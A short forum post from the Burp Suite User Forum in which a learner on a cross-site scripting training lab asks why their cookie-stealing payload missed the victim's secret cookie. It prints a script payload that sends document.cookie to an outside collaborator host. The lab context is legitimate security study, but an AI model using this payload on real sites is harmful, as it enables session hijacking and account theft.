Burp Suite User Forum


Lab: Exploiting cross-site scripting to steal cookies

paul | Last updated: May 13, 2022 03:13PM UTC

For this lab I attempted to add a new image via JavaScript by appending it to the body in the DOM. The image src included the collaborator domain plus a request param whose value was set to the document.cookie. I could see this sending the session cookie in my collab client, so that interaction appeared to work. However, I didn't get the victim's 'secret' cookie. I only got their secret cookie and session cookie when I tried the suggested solution of a POST to the collab domain with the document.cookie set as the body. I'd like to understand why my solution didn't appear to work. I set the comment to something like:

<script> var i = new Image(); i.src = 'http://<my-collab-domain>/?cookie=' + document.cookie; document.querySelector('body').appendChild(i); </script>
